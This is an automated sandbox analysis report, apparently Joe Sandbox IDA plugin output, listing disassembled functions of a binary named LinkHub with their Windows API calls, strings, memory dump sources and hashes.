                                                                    • Opcode ID: eb8ee2c9e4e7cec0ae2f043e2850bc9accef142276e717de9632c855b03a917b
                                                                    • Instruction ID: 4f47de22da0a6af748f95c6b16052024cc2d63aa7f9f2d93a02768764a6e2c93
                                                                    • Opcode Fuzzy Hash: eb8ee2c9e4e7cec0ae2f043e2850bc9accef142276e717de9632c855b03a917b
                                                                    • Instruction Fuzzy Hash: 122156716003859BDB309FAA8C04A9977A8BF55734F340A19FCB1D32D1D7B09990DB60
                                                                    Function 00D04B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C77873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C778B1
                                                                      • Part of subcall function 00C77873: GetStockObject.GDI32(00000011), ref: 00C778C5
                                                                      • Part of subcall function 00C77873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C778CF
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00D04BB0
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00D04BBD
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00D04BC8
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00D04BD7
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00D04BE3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: d8ac30ba93df6ad18da80052cbc3ebf9cd33d427ee81e90fb7c79292af162097
                                                                    • Instruction ID: adcb37d4f873041bcad78cd9a0cda65e9792546d717bad2b771fcb4b79c76c15
                                                                    • Opcode Fuzzy Hash: d8ac30ba93df6ad18da80052cbc3ebf9cd33d427ee81e90fb7c79292af162097
                                                                    • Instruction Fuzzy Hash: FF1181B214021DBEEB119EA5CC85FEB7F6DEF08758F014111B608A2090CA72DC21DBB0
                                                                    Function 00CADB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CADB23: _free.LIBCMT ref: 00CADB4C
                                                                    • _free.LIBCMT ref: 00CADBAD
                                                                      • Part of subcall function 00CA2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?), ref: 00CA2D4E
                                                                      • Part of subcall function 00CA2D38: GetLastError.KERNEL32(?,?,00CADB51,?,00000000,?,00000000,?,00CADB78,?,00000007,?,?,00CADF75,?,?), ref: 00CA2D60
                                                                    • _free.LIBCMT ref: 00CADBB8
                                                                    • _free.LIBCMT ref: 00CADBC3
                                                                    • _free.LIBCMT ref: 00CADC17
                                                                    • _free.LIBCMT ref: 00CADC22
                                                                    • _free.LIBCMT ref: 00CADC2D
                                                                    • _free.LIBCMT ref: 00CADC38
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                    • Instruction ID: 70eef5ad7496177209b7e64dd9938da009a34f102c668ab921131bb1cf407e8a
                                                                    • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                    • Instruction Fuzzy Hash: 8D115E72941B15BBD620BBB0DC07FCB77DCAF06708F410C19B29BAA693DB75B504A660
                                                                    Function 00CDE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CDE328
                                                                    • LoadStringW.USER32(00000000), ref: 00CDE32F
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CDE345
                                                                    • LoadStringW.USER32(00000000), ref: 00CDE34C
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CDE390
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00CDE36D
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 4072794657-3128320259
                                                                    • Opcode ID: f6f6f9def3826d5cc2ed184d825ff625a7550d43e16eb91dc9913dd1bed44ba6
                                                                    • Instruction ID: 6f768a7510bf4479a2e97259c74ff04f2b652f7d28c6004be1db176ba37401e7
                                                                    • Opcode Fuzzy Hash: f6f6f9def3826d5cc2ed184d825ff625a7550d43e16eb91dc9913dd1bed44ba6
                                                                    • Instruction Fuzzy Hash: 45011DF690030C7FE711ABE49D89FEB776CDB08300F404592B74AE6251EA749E848B75
                                                                    Function 00CE1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00CE1322
                                                                    • EnterCriticalSection.KERNEL32(00000000,?), ref: 00CE1334
                                                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 00CE1342
                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00CE1350
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CE135F
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CE136F
                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 00CE1376
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: a9d273d26d105a8cbbaa8921d17260b2cca8c2d034ec188eed741921d2a68c15
                                                                    • Instruction ID: 4c752ae477af6a78fb5b58620bc74272f8ad4c64757bf0a77ce55ac04058cbc6
                                                                    • Opcode Fuzzy Hash: a9d273d26d105a8cbbaa8921d17260b2cca8c2d034ec188eed741921d2a68c15
                                                                    • Instruction Fuzzy Hash: 35F0EC32042712BBD7415BA4EE49BD6BB3AFF04302F441126F106D19B08B749571CFA5
                                                                    Function 00CF26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00CF281D
                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CF283E
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF284F
                                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00CF2938
                                                                    • inet_ntoa.WSOCK32(?), ref: 00CF28E9
                                                                      • Part of subcall function 00CD433E: _strlen.LIBCMT ref: 00CD4348
                                                                      • Part of subcall function 00CF3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00CEF669), ref: 00CF3C9D
                                                                    • _strlen.LIBCMT ref: 00CF2992
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 3203458085-0
                                                                    • Opcode ID: 367aca6f8700438a4a7892bfcd5e00f2715f25f69c577911aeb4a98719894eab
                                                                    • Instruction ID: 11f1addb1c5ae53e13ccd495951b46450aa5945d468e3aaa70ba085010110fac
                                                                    • Opcode Fuzzy Hash: 367aca6f8700438a4a7892bfcd5e00f2715f25f69c577911aeb4a98719894eab
                                                                    • Instruction Fuzzy Hash: DEB1D371604305AFD324DF24C885F2A7BE5EF84318F54854CF56A4B2A2DB31EE45DB92
                                                                    Function 00CA0527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __allrem.LIBCMT ref: 00CA042A
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA0446
                                                                    • __allrem.LIBCMT ref: 00CA045D
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA047B
                                                                    • __allrem.LIBCMT ref: 00CA0492
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CA04B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1992179935-0
                                                                    • Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                    • Instruction ID: 704f1de6ee41de3528a4bf506ebdc81150460e0f2ddd6f3eaf41acef829c4cf4
                                                                    • Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                    • Instruction Fuzzy Hash: 4C810A71A017079BEB24AE69CC81B6F73F8AF463A8F34412AF521D7292E770DE409754
                                                                    Function 00CA6571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C98649,00C98649,?,?,?,00CA67C2,00000001,00000001,8BE85006), ref: 00CA65CB
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CA67C2,00000001,00000001,8BE85006,?,?,?), ref: 00CA6651
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CA674B
                                                                    • __freea.LIBCMT ref: 00CA6758
                                                                      • Part of subcall function 00CA3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3BC5
                                                                    • __freea.LIBCMT ref: 00CA6761
                                                                    • __freea.LIBCMT ref: 00CA6786
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: 314037b5cc0983cef8a58643f1a391d49d363ec951079485e02a089722846472
                                                                    • Instruction ID: 10954a0fcb0a9706bc86a3408faf4353e70a26b4f0a7d02d1c3bd2312270bf70
                                                                    • Opcode Fuzzy Hash: 314037b5cc0983cef8a58643f1a391d49d363ec951079485e02a089722846472
                                                                    • Instruction Fuzzy Hash: 53510472620207AFDB258F64CC85EBB77AAEB4275CF190269FC24D6140EB34DD50D6A0
                                                                    Function 00CFC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CFD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CFC10E,?,?), ref: 00CFD415
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD451
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4C8
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFC72A
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CFC785
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFC7CA
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CFC7F9
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CFC853
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00CFC85F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                    • String ID:
                                                                    • API String ID: 1120388591-0
                                                                    • Opcode ID: f99e02df5bc601e3cf3b55c061509240a4cf47fa24b01d5cb5e1cf7d7b436c9c
                                                                    • Instruction ID: 03655e45306ff7432d079c93b8be76f4f357c118b0430d923e746beaddbfcf72
                                                                    • Opcode Fuzzy Hash: f99e02df5bc601e3cf3b55c061509240a4cf47fa24b01d5cb5e1cf7d7b436c9c
                                                                    • Instruction Fuzzy Hash: BA819D74208249AFC754EF24C984E2ABBE5FF84308F14845DF5598B2A2CB31ED45DB92
                                                                    Function 00CD009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000035), ref: 00CD00A9
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00CD0150
                                                                    • VariantCopy.OLEAUT32(00CD0354,00000000), ref: 00CD0179
                                                                    • VariantClear.OLEAUT32(00CD0354), ref: 00CD019D
                                                                    • VariantCopy.OLEAUT32(00CD0354,00000000), ref: 00CD01A1
                                                                    • VariantClear.OLEAUT32(?), ref: 00CD01AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                    • String ID:
                                                                    • API String ID: 3859894641-0
                                                                    • Opcode ID: f0134cd3297d47152bf88f4a4ec185aaae192ad3c9762c0339cd267050af388a
                                                                    • Instruction ID: f68eff5ccf4d812b771f789843143d489394a2d178de72d724350848c91d811f
                                                                    • Opcode Fuzzy Hash: f0134cd3297d47152bf88f4a4ec185aaae192ad3c9762c0339cd267050af388a
                                                                    • Instruction Fuzzy Hash: 7A51EA31541310AACF20AB69D889B6DB3A5EF45310F34844BFA0ADF396DB709C40DB56
                                                                    Function 00CE9B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C741EA: _wcslen.LIBCMT ref: 00C741EF
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00CE9F2A
                                                                    • _wcslen.LIBCMT ref: 00CE9F4B
                                                                    • _wcslen.LIBCMT ref: 00CE9F72
                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00CE9FCA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                    • String ID: X
                                                                    • API String ID: 83654149-3081909835
                                                                    • Opcode ID: 16f893a82765fc698a038dd5ae16e7351a5528282fdd7387efa6e6430b213eba
                                                                    • Instruction ID: fd9b31ad31c75bcaa3df916d99054f0dd9557081fe659fa66b681629efcb1e49
                                                                    • Opcode Fuzzy Hash: 16f893a82765fc698a038dd5ae16e7351a5528282fdd7387efa6e6430b213eba
                                                                    • Instruction Fuzzy Hash: C5E1A1316043509FC724EF25C885B6AB7E1FF84314F14896DF99A8B2A2DB31DE05DB92
                                                                    Function 00CE6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00CE6F21
                                                                    • CoInitialize.OLE32(00000000), ref: 00CE707E
                                                                    • CoCreateInstance.OLE32(00D10CC4,00000000,00000001,00D10B34,?), ref: 00CE7095
                                                                    • CoUninitialize.OLE32 ref: 00CE7319
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                    • String ID: .lnk
                                                                    • API String ID: 886957087-24824748
                                                                    • Opcode ID: ffc8ff8418d460968ee912bfaae880adeaba6e2977f4849d8d02382fdc563e78
                                                                    • Instruction ID: 93483417b99762ed30eaa416aff39e54d1d69e1b30042d9df37ea39703b1b1c6
                                                                    • Opcode Fuzzy Hash: ffc8ff8418d460968ee912bfaae880adeaba6e2977f4849d8d02382fdc563e78
                                                                    • Instruction Fuzzy Hash: 98D15971508241AFC304EF24C885E6BB7E8FF98704F40896DF5998B262DB71ED49DB92
                                                                    Function 00C71B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • BeginPaint.USER32(?,?,?), ref: 00C71B35
                                                                    • GetWindowRect.USER32(?,?), ref: 00C71B99
                                                                    • ScreenToClient.USER32(?,?), ref: 00C71BB6
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C71BC7
                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00C71C15
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00CB3287
                                                                      • Part of subcall function 00C71C2D: BeginPath.GDI32(00000000), ref: 00C71C4B
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                    • String ID:
                                                                    • API String ID: 3050599898-0
                                                                    • Opcode ID: 9bec024c12a43c4e6c641f47d9defa37b40ea8da9c35b8d0e0c55b5034312ca7
                                                                    • Instruction ID: bbc1fa951b7b790e3f5d5708864c00563ca65109db7a262b8815a8731eba0cd0
                                                                    • Opcode Fuzzy Hash: 9bec024c12a43c4e6c641f47d9defa37b40ea8da9c35b8d0e0c55b5034312ca7
                                                                    • Instruction Fuzzy Hash: 6A41D470204344AFC711DF68DC85FBA7BA8EF46320F044669F9A8CB2A2C7319944DB62
                                                                    Function 00D08C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00CCFBEF,00000000,?,?,00000000,?,00CB39E2,00000004,00000000,00000000), ref: 00D08CA7
                                                                    • EnableWindow.USER32(?,00000000), ref: 00D08CCD
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00D08D2C
                                                                    • ShowWindow.USER32(?,00000004), ref: 00D08D40
                                                                    • EnableWindow.USER32(?,00000001), ref: 00D08D66
                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00D08D8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 65789b76016e06795ce912e9c7ed529f3ad2a495b71da48ba01909417d8b148f
                                                                    • Instruction ID: bce35c99b1fe620f0cfc753009a42e46c94496c9d383d3f9e5758e0feaae2eb5
                                                                    • Opcode Fuzzy Hash: 65789b76016e06795ce912e9c7ed529f3ad2a495b71da48ba01909417d8b148f
                                                                    • Instruction Fuzzy Hash: 20416D34602344AFEB25DF24C889BA57BB1FB46304F1841A9E58D8B3E2CB31A855DB75
